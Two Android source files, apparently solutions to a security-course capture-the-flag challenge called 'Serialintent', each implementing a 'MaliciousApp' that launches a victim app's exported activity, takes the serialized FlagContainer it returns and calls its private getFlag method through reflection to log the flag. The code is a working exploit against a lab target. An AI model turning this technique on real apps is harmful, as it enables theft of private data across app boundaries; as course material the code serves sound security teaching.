File: Challenges/3 - Serialintent/Solutions/serialintentsolution/MaliciousApp/app/src/main/java/com/example/maliciousapp/MainActivity.java
package com.example.maliciousapp;

import androidx.activity.result.ActivityResultCallback;
import androidx.activity.result.ActivityResultLauncher;
import androidx.activity.result.contract.ActivityResultContract;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.appcompat.app.AppCompatActivity;

import android.app.Activity;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;

import com.example.victimapp.FlagContainer;

import java.lang.reflect.Method;

// https://medium.com/@kkunalandroid/serializable-in-android-with-example-38eb8b7334ea

public class MainActivity extends AppCompatActivity {

    private static final String TAG = "MOBIOTSEC";
    static final ComponentName SERIAL_ACTIVITY = new ComponentName("com.example.victimapp", "com.example.victimapp.SerialActivity");

    static class SerialContract extends ActivityResultContract<ComponentName, String> {

        @NonNull
        @Override
        public Intent createIntent(@NonNull Context context, ComponentName componentName) {
            Intent intent = new Intent();
            intent.setComponent(componentName);
            return intent;
        }

        @Override
        public String parseResult(int resultCode, @Nullable Intent data) {
            if(resultCode == Activity.RESULT_OK && data != null) {
                Log.i(TAG, "ENTERED " + data.getExtras());
                try {
                    FlagContainer s =  (FlagContainer) data.getExtras().get("flag");
                    Method method = s.getClass().getDeclaredMethod("getFlag");
                    method.setAccessible(true);
                    return (String) method.invoke(s);
                } catch (Exception e){
                    Log.i(TAG, Log.getStackTraceString(e));
                }
                Log.i(TAG, "END");
            }
            return null;
        }
    }

    static class SerialResultCallback implements ActivityResultCallback<String> {

        @Override
        public void onActivityResult(String result) {
            Log.i(TAG, result);
        }
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Intent intent = new Intent();
        intent.setComponent(new ComponentName("com.example.victimapp", "com.example.victimapp.SerialActivity"));
        ActivityResultLauncher<ComponentName> getFlag = registerForActivityResult(new SerialContract(), new SerialResultCallback());
        getFlag.launch(SERIAL_ACTIVITY);
    }
}

File: Challenges/3 - Serialintent/Solutions/SerialIntent/app/src/main/java/com/example/serialintent/MainActivity.kt
package com.example.serialintent

import android.app.Activity
import android.content.ComponentName
import android.content.Intent
import android.os.Build
import android.os.Bundle
import android.util.Log
import androidx.activity.ComponentActivity
import androidx.activity.result.ActivityResult
import androidx.activity.result.contract.ActivityResultContracts
import com.example.victimapp.FlagContainer
import java.io.Serializable

class MainActivity : ComponentActivity() {

    //Avoid using getSerializableExtra
    inline fun <reified T : Serializable> Bundle.serializable(key: String): T? = when {
        Build.VERSION.SDK_INT >= Build.VERSION_CODES.TIRAMISU -> getSerializable(key, T::class.java)
        else -> @Suppress("DEPRECATION") getSerializable(key) as? T
    }

    inline fun <reified T : Serializable> Intent.serializable(key: String): T? = when {
        Build.VERSION.SDK_INT >= Build.VERSION_CODES.TIRAMISU -> getSerializableExtra(key, T::class.java)
        else -> @Suppress("DEPRECATION") getSerializableExtra(key) as? T
    }


    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)

        // Register for activity result
        val launchActivity = registerForActivityResult(ActivityResultContracts.StartActivityForResult()) { result: ActivityResult ->
            if (result.resultCode == Activity.RESULT_OK) {
                val data: Intent? = result.data
                handleFlag(data)
            }
        }

        // Create an intent with the victim app's package name and SerialActivity component
        val componentName = ComponentName("com.example.victimapp", "com.example.victimapp.SerialActivity")
        val intent = Intent()
        intent.component = componentName

        // Launch the intent
        launchActivity.launch(intent)
    }



    private fun handleFlag(data: Intent?) {
        if (data != null) {
            // Extract the FlagContainer using reflection
            Log.e("MOBIOTSEC", "Extracting flag")

            val flagContainer = data.serializable<FlagContainer>("flag")
            if (flagContainer != null) {
                try {
                    val getFlagMethod = flagContainer.javaClass.getDeclaredMethod("getFlag")
                    getFlagMethod.isAccessible = true
                    val flagValue = getFlagMethod.invoke(flagContainer) as String
                    // Log the flag
                    Log.i("MOBIOTSEC", "Reversed Flag: $flagValue")
                } catch (e: Exception) {
                    Log.e("MOBIOTSEC", "Error extracting flag: ${e.message}")
                }
            } else {
                Log.e("MOBIOTSEC", "FlagContainer is null")
            }
        } else {
            Log.i("MOBIOTSEC", "Flag is null")
        }
    }
}
